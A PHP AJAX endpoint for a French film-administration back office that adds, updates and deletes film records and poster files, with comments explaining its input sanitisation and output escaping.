
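<?php
include_once '../../../php/dao/include_dao.php';
include_once '../outils.php';

/*
 * AJAX endpoint of the film administration screen.
 *
 * $_POST['op'] selects the operation:
 *   add        - insert a new film (no pkFilm posted)
 *   mod        - update the film identified by pkFilm
 *   modAffiche - same update, submitted by the poster form
 *   del        - delete the film identified by pkFilm
 *   delAffiche - blank the poster column and remove the poster files
 * The script then prints what the caller expects: the saved name (mod), the
 * saved poster name (modAffiche) or the refreshed film menu with its click
 * handlers (add, del). Every posted value is untrusted: the poster file name is
 * reduced to a bare name before touching the disk, and printed values are
 * escaped for their HTML / JavaScript context.
 */

/**
 * Returns a posted field, or null when the browser did not send it, instead of
 * raising an "undefined index" notice on a direct $_POST[...] read.
 *
 * @param string $nom form field name
 * @return mixed the raw posted value (a string, or an array for multi-valued fields)
 */
function dataFilmChamp($nom)
{
    return isset($_POST[$nom]) ? $_POST[$nom] : null;
}

/**
 * Copies the posted form fields shared by add / mod / delAffiche onto $film.
 * The key, the poster and the release date are set by each branch because they
 * differ per operation.
 *
 * @param Film $film record filled in place
 */
function dataFilmRemplir(Film $film)
{
    $film->nomFilm = dataFilmChamp('nomFilm');
    $film->fkGroupe = dataFilmChamp('fkGroupe');
    $film->description = dataFilmChamp('description');
    $film->urlSite = dataFilmChamp('urlSite');
    $film->urlVideo = dataFilmChamp('urlVideo');
    $film->urlExterneTarget = dataFilmChamp('urlExterneTarget');
    $film->urlExterne = dataFilmChamp('urlExterne');
    $film->information = dataFilmChamp('information');
    $film->realisateur = dataFilmChamp('realisateur');
    $film->acteur = dataFilmChamp('acteur');
    $film->duree = dataFilmChamp('duree');
    // Checkboxes are only posted when ticked; testValeur() (outils.php) maps the
    // "on" value to the stored flag. An unticked box leaves the property untouched.
    if (isset($_POST['actif'])) {
        $film->actif = testValeur($_POST['actif'], "on", -1, 0);
    }
    if (isset($_POST['acceuil'])) {
        $film->acceuil = testValeur($_POST['acceuil'], "on", -1, 0);
    }
}

/**
 * Escapes a value for the HTML fragment this script prints.
 * NOTE(review): assumes the page is served as UTF-8 — confirm against the
 * application's charset.
 *
 * @param mixed $valeur
 * @return string
 */
function dataFilmHtml($valeur)
{
    return htmlspecialchars((string) $valeur, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Encodes a value as a JavaScript literal for the inline <script> below; the
 * HEX flags keep "<", ">", "&" and quotes from terminating the script element.
 * json_encode() keeps the key's own type (number or string); either posts the same way.
 *
 * @param mixed $valeur
 * @return string
 */
function dataFilmJs($valeur)
{
    return json_encode($valeur, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

$transaction = new Transaction();
$film = new Film();
$op = dataFilmChamp('op');
$pkFilm = dataFilmChamp('pkFilm');

/* New record */
if ($op === 'add' && $pkFilm === null) {
    dataFilmRemplir($film);
    $film->affiche = dataFilmChamp('affiche');
    // The form posts the date in French format; the DAO stores the local one.
    $film->dateSortie = Date::dateFrancaisToLocal(dataFilmChamp('dateSortie'));
    DAOFactory::getFilmDAO()->insert($film);
    $transaction->commit();
}

/* Update of an existing film (modAffiche comes from the poster form, same fields) */
if (($op === 'mod' || $op === 'modAffiche') && $pkFilm !== null && $pkFilm !== '') {
    $film->pkFilm = $pkFilm;
    dataFilmRemplir($film);
    $film->affiche = dataFilmChamp('affiche');
    $film->dateSortie = Date::dateFrancaisToLocal(dataFilmChamp('dateSortie'));
    DAOFactory::getFilmDAO()->update($film);
    $transaction->commit();
}

/* Deletion */
if ($op === 'del' && $pkFilm !== null) {
    $film->pkFilm = $pkFilm;
    DAOFactory::getFilmDAO()->delete($film->pkFilm);
    $transaction->commit();
}

/* Poster removal: blank the column, then delete the image and its thumbnail */
if ($op === 'delAffiche' && isset($_POST['affiche'])) {
    $film->pkFilm = $pkFilm;
    dataFilmRemplir($film);
    $film->affiche = "";
    // NOTE(review): unlike add / mod, this branch stores the posted date as-is
    // (no Date::dateFrancaisToLocal); kept that way — confirm the poster form
    // posts the stored format.
    $film->dateSortie = dataFilmChamp('dateSortie');
    // A single update is enough; the original issued the same update twice.
    DAOFactory::getFilmDAO()->update($film);

    // The posted value is only ever a file name: basename() drops any directory
    // part, so the deletion cannot reach outside the media folder, and "." / ".."
    // are refused because they name directories, not files.
    $nomAffiche = basename((string) $_POST['affiche']);
    if ($nomAffiche !== '' && $nomAffiche !== '.' && $nomAffiche !== '..') {
        $chemins = [
            '../../media/files/' . $nomAffiche,
            '../../media/files/thumbnail/' . $nomAffiche,
        ];
        foreach ($chemins as $chemin) {
            // Each file is checked on its own, so a missing thumbnail no longer
            // makes unlink() emit a warning.
            if (is_file($chemin)) {
                unlink($chemin);
            }
        }
    }
    $transaction->commit();
}

/* Response fragment: the saved value for mod / modAffiche.
   NOTE(review): escaped for an HTML context like the menu below — confirm the
   caller inserts it as HTML rather than as plain text. */
if ($op === 'mod') {
    echo dataFilmHtml($film->nomFilm);
}

if ($op === 'modAffiche') {
    echo dataFilmHtml($film->affiche);
}

/* Response fragment: the refreshed film menu and its click handlers */
if ($op === 'add' || $op === 'del') {
    // One query feeds both the link list and the script block below.
    $films = DAOFactory::getFilmDAO()->queryAllOrderBy('nomFilm');

    foreach ($films as $ligne) {
        echo '<a id="menuObj_' . dataFilmHtml($ligne->pkFilm) . '" href="javascript:void(0)">'
            . dataFilmHtml($ligne->nomFilm) . "</a><br>";
    }
    ?>
    <script>
        <?php foreach ($films as $ligne) { ?>
        $(<?php echo dataFilmJs('#menuObj_' . $ligne->pkFilm); ?>).click(function () {
            execAjax('php/film/contenu.php', '#content', {
                op: 'mod',
                pkFilm: <?php echo dataFilmJs($ligne->pkFilm); ?>
            }, 0);
        });
        <?php } ?>
    </script>
    <?php
}
?>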
